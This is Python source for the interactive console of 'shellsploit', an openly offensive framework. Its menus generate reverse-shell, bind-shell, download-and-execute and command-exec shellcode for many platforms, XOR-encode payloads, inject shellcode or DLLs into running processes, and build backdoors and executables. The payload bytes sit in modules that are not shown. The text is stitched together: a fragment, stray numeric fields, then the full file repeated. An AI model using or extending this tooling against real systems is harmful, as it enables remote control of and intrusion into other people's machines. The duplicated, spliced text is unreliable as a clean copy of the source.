if string == "windows/messagebox":
self.disassembly = generator("windows", "messagebox", MESSAGE=self.argvlist[2])
elif string == "windows/download&execute":
self.disassembly = generator("windows", "downloandandexecute", URL=self.argvlist[2], FILENAME=self.argvlist[3])
elif string == "windows/exec":
self.disassembly = generator("windows", "exec", COMMAND=self.argvlist[2])
elif string == "windows/reverse_tcp":
self.disassembly = generator("windows", "reverse_tcp", ip=self.argvlist[3], port=self.argvlist[2])
elif string == "windows/tcp_bind":
self.disassembly = generator("windows", "tcp_bind", port=self.argvlist[2])
elif string[:10] == "solarisx86":
if string == "solarisx86/binsh_spawn":
self.disassembly = generator("solarisx86", "binsh_spawn")
elif string == "solarisx86/read":
if self.argvlist[2] == "None":
print("\nFile name must be declared.\n")
self.control(string)
self.disassembly = generator("solarisx86", "read", FILE=self.argvlist[2])
elif string == "solarisx86/reverse_tcp":
self.disassembly = generator("solarisx86", "reverse_tcp", ip=self.argvlist[3], port=self.argvlist[2])
elif string == "solarisx86/tcp_bind":
self.disassembly = generator("solarisx86", "tcp_bind", port=self.argvlist[2])
if self.argvlist[0] == "x86/xor_b3m":
from .encoders.shellcode.xor_b3m import prestart
if self.argvlist[1] == "None":
self.argvlist[1] = 1
elif self.argvlist[1] == 0:
self.argvlist[1] = 1
self.disassembly = prestart(self.disassembly.replace("\\x", ""), int(self.argvlist[1]))
elif self.argvlist[0] == "x86/xor":
from .encoders.shellcode.xor import prestart
if self.argvlist[1] == "None":
self.argvlist[1] = 1
elif self.argvlist[1] == 0:
self.argvlist[1] = 1
self.disassembly = prestart(self.disassembly.replace("\\x", ""), int(self.argvlist[1]))
else:
self.disassembly = self.disassembly
# print "\n"+"Shellcode Lenght : %d" % len(str(bytearray(self.disassembly.replace("\\x", "").decode("hex"))))
B3mB4m.prettyout(self.disassembly)
self.control(string)
elif terminal[:6] == "output":
if self.disassembly == "None":
print("Please generate shellcode before save it.")
self.control(string)
# I'm not sure about this option, should I get this option with params
# Or directly inputs ? ..
if terminal[7:10].lower() == "exe":
# Will be add missing parts ..
if "linux86" in terminal.lower():
OS = "linux86"
elif "linux64" in terminal.lower():
OS = "linux64"
elif "windows" in terminal.lower():
OS = "windows"
elif "freebsdx86" in terminal.lower():
OS = "freebsdx86"
elif "freebsdx64" in terminal.lower():
OS = "freebsdx64"
elif "openbsdx86" in terminal.lower():
OS = "openbsdx86"
elif "solarisx86" in terminal.lower():
OS = "solarisx86"
elif "linuxpowerpc" in terminal.lower():
OS = "linuxpowerpc"
elif "openbsdpowerpc" in terminal.lower():
OS = "openbsdpowerpc"
elif "linuxsparc" in terminal.lower():
OS = "linuxsparc"
elif "freebsdsparc" in terminal.lower():
OS = "freebsdsparc"
elif "openbsdsparc" in terminal.lower():
OS = "openbsdsparc"
elif "solarissparc" in terminal.lower():
OS = "solarissparc"
elif "linuxarm" in terminal.lower():
OS = "linuxarm"
elif "freebsdarm" in terminal.lower():
OS = "freebsdarm"
elif "openbsdarm" in terminal.lower():
OS = "openbsdarm"
else:
OS = None
from .Outputs.exe import ExeFile
ExeFile(self.disassembly, OS)
self.control(string)
elif terminal[7:10].lower() == "c++" or terminal[7:10].lower() == "cpp":
from .Outputs.Cplusplus import CplusplusFile
if "windows" in string:
CplusplusFile(self.disassembly, True)
else:
CplusplusFile(self.disassembly)
elif terminal[7:8].lower() == "c":
if "windows" in string:
from .Outputs.Cplusplus import CplusplusFile
CplusplusFile(self.disassembly, True)
else:
from .Outputs.C import CFile
CFile(self.disassembly)
elif terminal[7:9].lower() == "py" or terminal[7:13].lower() == "python":
from .Outputs.python import PyFile
PyFile(self.disassembly)
elif terminal[7:10].lower() == "txt":
from .Outputs.txt import TxtFile
TxtFile(self.disassembly)
else:
print(bcolors.RED + bcolors.BOLD + "[-] Unknown output type: {0}".format(terminal) + bcolors.ENDC)
self.control(string)
elif terminal[:5] == "clear":
B3mB4m.clean()
self.control(string)
elif terminal[:2].lower() == "ip":
B3mB4m.IP()
self.control(string)
elif terminal[:13] == "show encoders":
from .core.lists import encoderlist
encoderlist()
self.control(string)
elif terminal[:5] == "disas":
B3mB4m().startdisas( self.disassembly, string)
self.control(string)
else:
if not terminal:
self.control(string)
else:
print(bcolors.RED + bcolors.BOLD + "[-] Unknown command: {0}".format(terminal) + bcolors.ENDC)
self.control(string)
| 50.883641
| 140
| 0.466683
|
import sys
import os
from .core.color import *
from re import findall
from .core.Comp import tab
from lib.base.framework import ShellsploitFramework
if sys.version_info.major >= 3:
raw_input = input
class B3mB4m(ShellsploitFramework):
def __init__(self):
ShellsploitFramework.__init__(self)
self.argvlist = ["None", "None", "None", "None"]
self.disassembly = "None"
self.mycache = "None"
def control(self, string):
bash = bcolors.OKBLUE + bcolors.UNDERLINE + "ssf" + bcolors.ENDC
bash += ":"
bash += bcolors.RED + string + bcolors.ENDC
bash += bcolors.OKBLUE + " > " + bcolors.ENDC
try:
terminal = raw_input(bash)
except KeyboardInterrupt:
B3mB4m.exit("\n[*] (Ctrl + C ) Detected, Trying To Exit ...")
if string[:9] == "injectors":
tab.completion("injectors")
if terminal[:4] == "help":
from .core.help import injectorhelp
injectorhelp()
self.control(string)
elif terminal[:4] == "back":
self.argvlist = ["None", "None", "None", "None"]
pass
elif terminal[:4] == "exit":
B3mB4m.exit("\nThanks for using shellsploit !\n")
elif terminal[:4] == "pids":
B3mB4m.pids("wholelist")
self.control(string)
elif terminal[:6] == "getpid":
B3mB4m.pids(None, terminal[7:])
self.control(string)
elif terminal[:5] == "clear":
B3mB4m.clean()
self.control(string)
elif terminal[:5] == "unset":
if string in B3mB4m.bfdlist():
if terminal[6:] == "exe" or terminal[6:] == "file":
self.argvlist[0] = "None"
elif terminal[6:] == "host":
self.argvlist[1] = "None"
elif terminal[6:] == "port":
self.argvlist[2] = "None"
else:
print(bcolors.RED + bcolors.BOLD + "[-] Unknown command: {0}".format(terminal) + bcolors.ENDC)
elif string == "injectors/Windows/x86/tLsInjectorDLL":
if terminal[6:] == "exe":
self.argvlist[0] = "None"
elif terminal[6:] == "dll":
self.argvlist[1] = "None"
else:
print(bcolors.RED + bcolors.BOLD + "[-] Unknown command: {0}".format(terminal) + bcolors.ENDC)
elif string == "injectors/Windows/x86/CodecaveInjector":
if terminal[6:] == "exe":
self.argvlist[0] = "None"
elif terminal[6:] == "shellcode":
self.argvlist[1] = "None"
else:
if terminal[6:] == "pid":
self.argvlist[0] = "None"
elif terminal[6:] == "shellcode":
self.argvlist[1] = "None"
else:
print(bcolors.RED + bcolors.BOLD + "[-] Unknown command: {0}".format(terminal) + bcolors.ENDC)
self.control(string)
elif terminal[:3] == "set":
if string in B3mB4m.bfdlist():
if terminal[4:7] == "exe" or terminal[4:8] == "file":
self.argvlist[0] = terminal[9:]
elif terminal[4:8] == "host":
self.argvlist[1] = terminal[9:]
elif terminal[4:8] == "port":
self.argvlist[2] = terminal[9:]
else:
if not terminal:
self.control(string)
else:
print(bcolors.RED + bcolors.BOLD + "[-] Unknown command: {0}".format(terminal) + bcolors.ENDC)
elif string == "injectors/Windows/x86/tLsInjectorDLL":
if terminal[4:7] == "exe":
self.argvlist[0] = terminal[8:]
elif terminal[4:7] == "dll":
self.argvlist[1] = terminal[8:]
else:
if not terminal:
self.control(string)
else:
print(bcolors.RED + bcolors.BOLD + "[-] Unknown command: {0}".format(terminal) + bcolors.ENDC)
elif string == "injectors/Windows/x86/CodecaveInjector":
if terminal[4:7] == "exe":
self.argvlist[0] = terminal[8:]
elif terminal[4:13] == "shellcode":
self.argvlist[1] = terminal[14:]
else:
if not terminal:
self.control(string)
else:
print(bcolors.RED + bcolors.BOLD + "[-] Unknown command: {0}".format(terminal) + bcolors.ENDC)
else:
if terminal[4:7] == "pid":
self.argvlist[0] = terminal[8:]
elif terminal[4:13] == "shellcode":
if ".txt" in terminal[14:]:
if os.path.isfile(terminal[14:]):
with open(terminal[14:], "r") as shellcode:
cache = shellcode.readlines()
db = ""
for x in database:
db += x.strip().replace('"', "").replace('+', "").strip()
self.argvlist[1] = db
else:
print(bcolors.RED + bcolors.BOLD + "\nFile can't find, please try with full path.\n" + bcolors.ENDC)
self.control(string)
else:
self.argvlist[1] = terminal[14:]
else:
if not terminal:
self.control(string)
else:
print(bcolors.RED + bcolors.BOLD + "[-] Unknown command: {0}".format(terminal) + bcolors.ENDC)
self.control(string)
elif terminal[:14] == "show shellcode":
if string in B3mB4m.bfdlist():
print("This option not available for this module.")
self.control(string)
elif string == "injectors/Windowsx86/tLsInjectorDLL":
self.control(string)
else:
if self.argvlist[1] != "None":
B3mB4m.prettyout(self.argvlist[1])
else:
print("\nYou must set shellcode before this ..\b")
self.control(string)
elif terminal[:12] == "show options":
from .core.Injectoroptions import controlset
if string in B3mB4m.bfdlist():
controlset(string, self.argvlist[0], self.argvlist[1], self.argvlist[2])
self.control(string)
else:
if string != "injectors/Windows/x86/tLsInjectorDLL":
if self.argvlist[1] != "None":
self.mycache = "process"
controlset(string, self.argvlist[0], self.mycache)
self.control(string)
controlset(string, self.argvlist[0], self.argvlist[1])
self.control(string)
elif terminal[:5] == "clear":
B3mB4m.clean()
self.control(string)
elif terminal[:2] == "os":
B3mB4m.oscommand(terminal[3:])
self.control(string)
elif terminal[:6] == "inject":
if self.argvlist[0] == None or self.argvlist[1] == None:
print("\nYou must set pid/shellcode before inject !\n")
self.control(string)
if string == "injectors/Linux86/ptrace":
from .inject.menager import linux86ptrace
linux86ptrace(self.argvlist[0], self.argvlist[1])
elif string == "injectors/Linux64/ptrace":
from .inject.menager import linux64ptrace
linux64ptrace(self.argvlist[0], self.argvlist[1])
elif string == "injectors/Windows/byteman":
from .inject.menager import windows
windows(self.argvlist[0], self.argvlist[1])
elif string == "injectors/Windows/x86/tLsInjectorDLL":
from .inject.menager import winx86tLsDLL
winx86tLsDLL(self.argvlist[0], self.argvlist[1])
elif string == "injectors/Windows/x86/CodecaveInjector":
from .inject.menager import winx86Codecave
winx86Codecave(self.argvlist[0], self.argvlist[1])
elif string == "injectors/Windows/Dllinjector":
from .inject.menager import winDLL
winDLL(self.argvlist[0], self.argvlist[1])
elif string == "injectors/Windows/BFD/Patching":
from .inject.menager import winBFD
winBFD(self.argvlist[0], self.argvlist[1], int(self.argvlist[2]))
# elif string == "injectors/MacOSX/BFD/Patching":
# from .inject.menager import MacBFD
# MacBFD( FILE, HOST, PORT)
# elif string == "injectors/Linux/BFD/Patching":
# from .inject.menager import LinuxBFD
# LinuxBFD( FILE, HOST, PORT)
# elif string == "injectors/Linux/ARM/x86/BFD/Patching":
# from .inject.menager import LinuxARMx86BFD
# LinuxARMx86BFD( FILE, HOST, PORT)
# elif string == "FreeBSD/x86/BFD/Patching":
# from .inject.menager import FreeBSDx86
# FreeBSDx86( FILE, HOST, PORT)
self.control(string)
# elif terminal[:7] == "extract":
# Future option
# Make it executable (Dynamic virus land)
# from bla bla import executable
# generator()
elif terminal[:4] == "back":
self.argvlist = ["None", "None", "None", "None"]
pass
else:
if not terminal:
self.control(string)
else:
print(bcolors.RED + bcolors.BOLD + "[-] Unknown command: {0}".format(terminal) + bcolors.ENDC)
self.control(string)
# Backdoors
elif string[:9] == "backdoors":
tab.completion("backdoors")
if terminal[:4] == "help":
from .core.help import backdoorshelp
backdoorshelp()
self.control(string)
elif terminal[:4] == "exit":
B3mB4m.exit("\nThanks for using shellsploit !\n")
elif terminal[:2] == "os":
B3mB4m.oscommand(terminal[3:])
self.control(string)
elif terminal[:12] == "show options":
from .core.SHELLoptions import controlset
controlset(string, self.argvlist[0], self.argvlist[1])
self.control(string)
elif terminal[:5] == "unset":
if terminal[6:] == "lhost":
self.argvlist[0] = "None"
elif terminal[6:] == "lport":
self.argvlist[1] = "None"
# elif terminal[6:] == "encoder":
# self.argvlist[2] = "None"
else:
print(bcolors.RED + bcolors.BOLD + "[-] Unknown command: {0}".format(terminal) + bcolors.ENDC)
self.control(string)
elif terminal[:3] == "set":
if terminal[4:9].lower() == "lhost":
self.argvlist[0] = terminal[10:]
elif terminal[4:9].lower() == "lport":
self.argvlist[1] = terminal[10:]
# elif terminal[4:11].lower() == "encoder"
# self.argvlist[2] = terminal[11:]
else:
print(bcolors.RED + bcolors.BOLD + "This option is not available." + bcolors.ENDC)
self.control(string)
elif terminal[:8] == "generate":
from .Session.generator import process
# Custom output path will be add ..
if self.argvlist[0] == "None" or self.argvlist[1] == "None":
print("\nSet options before generate payload.\n")
self.control(string)
else:
process(data=string, HOST=self.argvlist[0], PORT=self.argvlist[1], ENCODER=False, logger=True)
self.control(string)
elif terminal[:5] == "clear":
B3mB4m.clean()
self.control(string)
elif terminal[:4] == "back":
self.argvlist = ["None", "None", "None", "None"]
pass
else:
if not terminal:
self.control(string)
else:
print(bcolors.RED + bcolors.BOLD + "[-] Unknown command: {0}".format(terminal) + bcolors.ENDC)
self.control(string)
# Shellcodes
else:
tab.completion("shellcodes")
if terminal[:4] == "help":
# if terminal[5:11] == "output":
# from Outputs.exehelp import help
# print help()
# self.control( string)
from .core.help import shellcodehelp
shellcodehelp()
self.control(string)
elif terminal[:2] == "os":
B3mB4m.oscommand(terminal[3:])
self.control(string)
elif terminal[:4] == "back":
self.argvlist = ["None", "None", "None", "None"]
pass
elif terminal[:4] == "exit":
B3mB4m.exit("\nThanks for using shellsploit !\n")
elif terminal[:10] == "whatisthis":
from .core.whatisthis import whatisthis
if "egg" in string:
message = "Egg-hunt"
elif "tcp" in string or "reverse" in string or "netcat" in string:
message = "Remote"
elif "download" in string:
message = "Download and execute"
else:
message = "Local"
# Add special part for particul
whatisthis(message)
self.control(string)
elif terminal[:5] == "unset":
if terminal[6:] == "encoder":
self.argvlist[0] = "None"
elif terminal[6:] == "iteration":
self.argvlist[1] = "None"
elif terminal[6:] == "file":
if string in B3mB4m.readlist():
self.argvlist[2] = "None"
else:
B3mB4m.invalidcommand()
elif terminal[6:] == "port":
if string in B3mB4m.tcpbindlist() or string in B3mB4m.reversetcplist():
self.argvlist[2] = "None"
else:
Base.invalidcommand()
elif terminal[6:] == "command":
if string in B3mB4m.execlist():
self.argvlist[2] = "None"
else:
B3mB4m.invalidcommand()
elif terminal[6:] == "link":
if string in B3mB4m.downloadandexecutelist():
self.argvlist[2] = "None"
else:
B3mB4m.invalidcommand()
elif terminal[6:] == "filename":
if string in B3mB4m.downloadandexecutelist():
self.argvlist[3] = "None"
else:
B3mB4m.invalidcommand()
elif terminal[6:] == "host":
if string in B3mB4m.reversetcplist():
self.argvlist[3] = "None"
else:
B3mB4m.invalidcommand()
else:
B3mB4m.invalidcommand()
self.control(string)
elif terminal[:3] == "set":
if terminal[4:8] == "file":
if string in B3mB4m.readlist():
self.argvlist[2] = terminal[9:]
else:
B3mB4m.invalidcommand()
elif terminal[4:8] == "port":
if string in B3mB4m.tcpbindlist() or string in B3mB4m.reversetcplist():
self.argvlist[2] = terminal[9:]
else:
B3mB4m.invalidcommand()
elif terminal[4:11] == "command":
if string in B3mB4m.execlist():
self.argvlist[2] = terminal[12:]
else:
B3mB4m.invalidcommand()
elif terminal[4:8] == "link":
if string in B3mB4m.downloadandexecutelist():
self.argvlist[2] = terminal[9:]
else:
B3mB4m.invalidcommand()
elif terminal[4:11] == "message":
if string in B3mB4m.messageboxlist():
self.argvlist[2] = terminal[12:]
else:
B3mB4m.invalidcommand()
elif terminal[4:8] == "host":
if string in B3mB4m.reversetcplist():
self.argvlist[3] = terminal[9:]
else:
B3mB4m.invalidcommand()
elif terminal[4:12] == "filename":
if string in B3mB4m.downloadandexecutelist():
self.argvlist[3] = terminal[13:]
else:
B3mB4m.invalidcommand()
elif terminal[4:11] == "encoder":
from .core.lists import encoders
if terminal[12:] not in encoders():
print("This encoder not in list !")
self.control(string)
self.argvlist[0] = terminal[12:]
elif terminal[4:13] == "iteration":
self.argvlist[1] = terminal[14:]
else:
B3mB4m.invalidcommand()
self.control(string)
elif terminal[:12] == "show options":
from .core.SHELLoptions import controlset
if string[:7] == "linux86":
if string == "linux86/read":
controlset(string, self.argvlist[2], self.argvlist[0], self.argvlist[1])
elif string == "linux86/chmod":
controlset(string, self.argvlist[2], self.argvlist[0], self.argvlist[1])
elif string == "linux86/tcp_bind":
controlset(string, self.argvlist[2], self.argvlist[0], self.argvlist[1])
elif string == "linux86/reverse_tcp":
controlset(string, self.argvlist[3], self.argvlist[2], self.argvlist[0], self.argvlist[1])
elif string == "linux86/download&exec":
controlset(string, self.argvlist[2], self.argvlist[0], self.argvlist[1])
elif string == "linux86/exec":
controlset(string, self.argvlist[2], self.argvlist[0], self.argvlist[1])
else:
controlset(string, self.argvlist[0], self.argvlist[1])
self.control(string)
elif string[:10] == "solarisx86":
if string == "solarisx86/read":
controlset(string, self.argvlist[2], self.argvlist[0], self.argvlist[1])
elif string == "solarisx86/reverse_tcp":
controlset(string, self.argvlist[3], self.argvlist[2], self.argvlist[0], self.argvlist[1])
elif string == "solarisx86/tcp_bind":
controlset(string, self.argvlist[2], self.argvlist[3], self.argvlist[0], self.argvlist[1])
else:
controlset(string, self.argvlist[0], self.argvlist[1])
self.control(string)
elif string[:7] == "linux64":
if string == "linux64/read":
controlset(string, self.argvlist[2], self.argvlist[0], self.argvlist[1])
elif string == "linux64/mkdir":
controlset(string, self.argvlist[2], self.argvlist[0], self.argvlist[1])
elif string == "linux64/tcp_bind":
controlset(string, self.argvlist[2], self.argvlist[0], self.argvlist[1])
elif string == "linux64/reverse_tcp":
controlset(string, self.argvlist[2], self.argvlist[3], self.argvlist[1], self.argvlist[0])
else:
controlset(string, self.argvlist[0], self.argvlist[1])
self.control(string)
elif string[:5] == "linux":
if string == "linux/read":
controlset(string, self.argvlist[2], self.argvlist[0], self.argvlist[1])
elif string == "linux/tcp_bind":
controlset(string, self.argvlist[2], self.argvlist[0], self.argvlist[1])
elif string == "linux/reverse_tcp":
controlset(string, self.argvlist[2], self.argvlist[3], self.argvlist[0], self.argvlist[1])
else:
controlset(string, self.argvlist[0], self.argvlist[1])
self.control(string)
elif string[:5] == "osx86":
if string == "osx86/tcp_bind":
controlset(string, self.argvlist[2], self.argvlist[0], self.argvlist[1])
elif string == "osx86/reverse_tcp":
controlset(string, self.argvlist[2], self.argvlist[3], self.argvlist[1], self.argvlist[0])
else:
controlset(string, self.argvlist[0], self.argvlist[1])
self.control(string)
elif string[:5] == "osx64":
if string == "osx64/tcp_bind":
controlset(string, self.argvlist[2], self.argvlist[0], self.argvlist[1])
elif string == "osx64/reverse_tcp":
controlset(string, self.argvlist[2], self.argvlist[3], self.argvlist[0], self.argvlist[1])
else:
controlset(string, self.argvlist[0], self.argvlist[1])
self.control(string)
elif string[:11] == "freebsd_x86":
if string == "freebsd_x86/reverse_tcp2":
controlset(string, self.argvlist[3], self.argvlist[2], self.argvlist[0], self.argvlist[1])
elif string == "freebsd_x86/reverse_tcp":
controlset(string, self.argvlist[3], self.argvlist[2], self.argvlist[0], self.argvlist[1])
elif string == "freebsd_x86/read":
controlset(string, self.argvlist[2], self.argvlist[0], self.argvlist[1])
elif string == "freebsd_x86/exec":
controlset(string, self.argvlist[2], self.argvlist[0], self.argvlist[1])
elif string == "freebsd_x86/tcp_bind":
controlset(string, self.argvlist[2], self.argvlist[0], self.argvlist[1])
else:
controlset(string, self.argvlist[0], self.argvlist[1])
self.control(string)
elif string[:11] == "freebsd_x64":
if string == "freebsd_x64/tcp_bind":
controlset(string, self.argvlist[0], self.argvlist[1], self.argvlist[2], self.argvlist[3])
elif string == "freebsd_x64/reverse_tcp":
controlset(string, self.argvlist[2], self.argvlist[3], self.argvlist[0], self.argvlist[1])
elif string == "freebsd_x64/exec":
controlset(string, self.argvlist[0], self.argvlist[1], self.argvlist[2])
else:
controlset(string, self.argvlist[0], self.argvlist[1])
self.control(string)
elif string[:9] == "linux_arm":
if string == "linux_arm/chmod":
controlset(string, self.argvlist[0], self.argvlist[1], self.argvlist[2])
elif string == "linux_arm/exec":
controlset(string, self.argvlist[0], self.argvlist[1], self.argvlist[2])
elif string == "linux_arm/reverse_tcp":
controlset(string, self.argvlist[2], self.argvlist[3], self.argvlist[0], self.argvlist[1])
else:
controlset(string, self.argvlist[0], self.argvlist[1])
self.control(string)
elif string[:10] == "linux_mips":
if string == "linux_mips/chmod":
controlset(string, self.argvlist[0], self.argvlist[1], self.argvlist[2])
elif string == "linux_mips/reverse_tcp":
controlset(string, self.argvlist[0], self.argvlist[1], self.argvlist[2], self.argvlist[3])
elif string == "linux_mips/tcp_bind":
controlset(string, self.argvlist[0], self.argvlist[1], self.argvlist[2])
else:
controlset(string, self.argvlist[0], self.argvlist[1])
self.control(string)
elif string[:7] == "windows":
if string == "windows/messagebox":
controlset(string, self.argvlist[2], self.argvlist[0], self.argvlist[1])
elif string == "windows/exec":
controlset(string, self.argvlist[1], self.argvlist[0], self.argvlist[2])
elif string == "windows/download&execute":
controlset(string, self.argvlist[0], self.argvlist[1], self.argvlist[2], self.argvlist[3])
elif string == "windows/reverse_tcp":
controlset(string, self.argvlist[2], self.argvlist[3], self.argvlist[0], self.argvlist[1])
elif string == "windows/tcp_bind":
controlset(string, self.argvlist[2], self.argvlist[0], self.argvlist[1])
self.control(string)
elif terminal[:8] == "generate":
from .database.generator import generator
if string[:7] == "linux86":
if string == "linux86/binsh_spawn":
self.disassembly = generator("linux86", "binsh_spawn")
elif string == "linux86/read":
if self.argvlist[2] == "None":
print("\nFile name must be declared.\n")
self.control(string)
self.disassembly = generator("linux86", "read", FILE=self.argvlist[2])
elif string == "linux86/exec":
if self.argvlist[2] == "None":
print("\nCommand must be declared.\n")
self.control(string)
self.disassembly = generator("linux86", "exec", COMMAND=self.argvlist[2])
elif string == "linux86/download&exec":
if self.argvlist[2] == "None":
print("\nLink must be declared.\n")
self.control(string)
elif "/" not in self.argvlist[2]:
print("\nWrong url format example : 127.0.0.1/X\n")
self.control(string)
elif len(self.argvlist[2].split("/")[-1]) != 1:
print("\nYour filename must be one lenght ..\n")
self.control(string)
if "http" in self.argvlist[2] or "https" in self.argvlist[2] or "www." in self.argvlist:
try:
edit = self.argvlist[2].replace("http://", "").replace("https://", "").replace("www.", "")
self.argvlist[2] = edit
except:
pass
self.disassembly = generator("linux86", "download&exec", URL=self.argvlist[2])
elif string == "linux86/chmod":
if self.argvlist[2] == "None":
print("\nFile name must be declared.\n")
self.control(string)
self.disassembly = generator("linux86", "chmod", FILE=self.argvlist[2])
elif string == "linux86/tcp_bind":
if self.argvlist[2] == "None":
print("\nPORT must be declared.\n")
self.control(string)
self.disassembly = generator("linux86", "tcp_bind", port=self.argvlist[2])
elif string == "linux86/reverse_tcp":
if self.argvlist[2] == "None" or self.argvlist[3] == "None":
print("\nHost&Port must be declared.\n")
self.control(string)
self.disassembly = generator("linux86", "reverse_tcp", ip=self.argvlist[3], port=self.argvlist[2])
elif string[:7] == "linux64":
if string == "linux64/binsh_spawn":
self.disassembly = generator("linux64", "binsh_spawn")
elif string == "linux64/tcp_bind":
self.disassembly = generator("linux64", "tcp_bind", port=self.argvlist[2])
elif string == "linux64/reverse_tcp":
self.disassembly = generator("linux64", "reverse_tcp", ip=self.argvlist[3], port=self.argvlist[2])
elif string == "linux64/read":
self.disassembly = generator("linux64", "read", FILE=self.argvlist[2])
if string[:5] == "linux":
if string == "linux/read":
if self.argvlist[2] == "None":
print("\nFile name must be declared.\n")
self.control(string)
self.disassembly = generator("linux", "read", FILE=self.argvlist[2])
elif string == "linux/binsh_spawn":
self.disassembly = generator("linux", "binsh_spawn")
elif string == "linux/tcp_bind":
self.disassembly = generator("linux", "tcp_bind", port=self.argvlist[2])
elif string == "linux/reverse_tcp":
self.disassembly = generator("linux", "reverse_tcp", ip=self.argvlist[3], port=self.argvlist[2])
elif string[:5] == "osx86":
if string == "osx86/tcp_bind":
self.disassembly = generator("osx86", "tcp_bind", port=self.argvlist[2])
elif string == "osx86/binsh_spawn":
self.disassembly = generator("osx86", "binsh_spawn")
elif string == "osx86/reverse_tcp":
self.disassembly = generator("osx86", "reverse_tcp", ip=self.argvlist[3], port=self.argvlist[2])
elif string[:5] == "osx64":
if string == "osx64/binsh_spawn":
self.disassembly = generator("osx64", "binsh_spawn")
elif string == "osx64/tcp_bind":
self.disassembly = generator("osx64", "tcp_bind", port=self.argvlist[2])
elif string == "osx64/reverse_tcp":
self.disassembly = generator("osx64", "reverse_tcp", ip=self.argvlist[3], port=self.argvlist[2])
elif string[:11] == "freebsd_x86":
if string == "freebsd_x86/binsh_spawn":
self.disassembly = generator("freebsdx86", "binsh_spawn")
elif string == "freebsd_x86/read":
self.disassembly = generator("freebsdx86", "read", FILE=self.argvlist[2])
elif string == "freebsd_x86/reverse_tcp":
self.disassembly = generator("freebsdx86", "reverse_tcp", ip=self.argvlist[3], port=self.argvlist[2])
elif string == "freebsd_x86/reverse_tcp2":
self.disassembly = generator("freebsdx86", "reverse_tcp2", ip=self.argvlist[3], port=self.argvlist[2])
elif string == "freebsd_x86/exec":
self.disassembly = generator("freebsdx86", "exec", COMMAND=self.argvlist[2])
elif string == "freebsd_x86/tcp_bind":
self.disassembly = generator("freebsdx86", "tcp_bind", port=self.argvlist[2])
elif string[:11] == "freebsd_x64":
if string == "freebsd_x64/binsh_spawn":
self.disassembly = generator("freebsdx64", "binsh_spawn")
elif string == "freebsd_x64/tcp_bind":
self.disassembly = generator("freebsdx64", "tcp_bind", port=self.argvlist[2], PASSWORD=self.argvlist[3])
elif string == "freebsd_x64/reverse_tcp":
self.disassembly = generator("freebsdx64", "reverse_tcp", ip=self.argvlist[3], port=self.argvlist[2])
elif string == "freebsd_x64/exec":
self.disassembly = generator("freebsdx64", "exec", COMMAND=self.argvlist[2])
elif string[:9] == "linux_arm":
if string == "linux_arm/chmod":
self.disassembly = generator("linux_arm", "chmod", FILE=self.argvlist[2])
elif string == "linux_arm/binsh_spawn":
self.disassembly = generator("linux_arm", "binsh_spawn")
elif string == "linux_arm/reverse_tcp":
self.disassembly = generator("linux_arm", "reverse_tcp", ip=self.argvlist[3], port=self.argvlist[2])
elif string == "linux_arm/exec":
self.disassembly = generator("linux_arm", "exec", COMMAND=self.argvlist[2])
elif string[:10] == "linux_mips":
if string == "linux_mips/reverse_tcp":
self.disassembly = generator("linux_mips", "reverse_tcp", ip=self.argvlist[3], port=self.argvlist[2])
elif string == "linux_mips/binsh_spawn":
self.disassembly = generator("linux_mips", "binsh_spawn")
elif string == "linux_mips/chmod":
self.disassembly = generator("linux_mips", "chmod", FILE=self.argvlist[2])
elif string == "linux_mips/tcp_bind":
self.disassembly = generator("linux_mips", "tcp_bind", port=self.argvlist[2])
elif string[:7] == "windows":
if string == "windows/messagebox":
self.disassembly = generator("windows", "messagebox", MESSAGE=self.argvlist[2])
elif string == "windows/download&execute":
self.disassembly = generator("windows", "downloandandexecute", URL=self.argvlist[2], FILENAME=self.argvlist[3])
elif string == "windows/exec":
self.disassembly = generator("windows", "exec", COMMAND=self.argvlist[2])
elif string == "windows/reverse_tcp":
self.disassembly = generator("windows", "reverse_tcp", ip=self.argvlist[3], port=self.argvlist[2])
elif string == "windows/tcp_bind":
self.disassembly = generator("windows", "tcp_bind", port=self.argvlist[2])
elif string[:10] == "solarisx86":
if string == "solarisx86/binsh_spawn":
self.disassembly = generator("solarisx86", "binsh_spawn")
elif string == "solarisx86/read":
if self.argvlist[2] == "None":
print("\nFile name must be declared.\n")
self.control(string)
self.disassembly = generator("solarisx86", "read", FILE=self.argvlist[2])
elif string == "solarisx86/reverse_tcp":
self.disassembly = generator("solarisx86", "reverse_tcp", ip=self.argvlist[3], port=self.argvlist[2])
elif string == "solarisx86/tcp_bind":
self.disassembly = generator("solarisx86", "tcp_bind", port=self.argvlist[2])
if self.argvlist[0] == "x86/xor_b3m":
from .encoders.shellcode.xor_b3m import prestart
if self.argvlist[1] == "None":
self.argvlist[1] = 1
elif self.argvlist[1] == 0:
self.argvlist[1] = 1
self.disassembly = prestart(self.disassembly.replace("\\x", ""), int(self.argvlist[1]))
elif self.argvlist[0] == "x86/xor":
from .encoders.shellcode.xor import prestart
if self.argvlist[1] == "None":
self.argvlist[1] = 1
elif self.argvlist[1] == 0:
self.argvlist[1] = 1
self.disassembly = prestart(self.disassembly.replace("\\x", ""), int(self.argvlist[1]))
else:
self.disassembly = self.disassembly
# print "\n"+"Shellcode Lenght : %d" % len(str(bytearray(self.disassembly.replace("\\x", "").decode("hex"))))
B3mB4m.prettyout(self.disassembly)
self.control(string)
elif terminal[:6] == "output":
if self.disassembly == "None":
print("Please generate shellcode before save it.")
self.control(string)
# I'm not sure about this option, should I get this option with params
# Or directly inputs ? ..
if terminal[7:10].lower() == "exe":
# Will be add missing parts ..
if "linux86" in terminal.lower():
OS = "linux86"
elif "linux64" in terminal.lower():
OS = "linux64"
elif "windows" in terminal.lower():
OS = "windows"
elif "freebsdx86" in terminal.lower():
OS = "freebsdx86"
elif "freebsdx64" in terminal.lower():
OS = "freebsdx64"
elif "openbsdx86" in terminal.lower():
OS = "openbsdx86"
elif "solarisx86" in terminal.lower():
OS = "solarisx86"
elif "linuxpowerpc" in terminal.lower():
OS = "linuxpowerpc"
elif "openbsdpowerpc" in terminal.lower():
OS = "openbsdpowerpc"
elif "linuxsparc" in terminal.lower():
OS = "linuxsparc"
elif "freebsdsparc" in terminal.lower():
OS = "freebsdsparc"
elif "openbsdsparc" in terminal.lower():
OS = "openbsdsparc"
elif "solarissparc" in terminal.lower():
OS = "solarissparc"
elif "linuxarm" in terminal.lower():
OS = "linuxarm"
elif "freebsdarm" in terminal.lower():
OS = "freebsdarm"
elif "openbsdarm" in terminal.lower():
OS = "openbsdarm"
else:
OS = None
from .Outputs.exe import ExeFile
ExeFile(self.disassembly, OS)
self.control(string)
elif terminal[7:10].lower() == "c++" or terminal[7:10].lower() == "cpp":
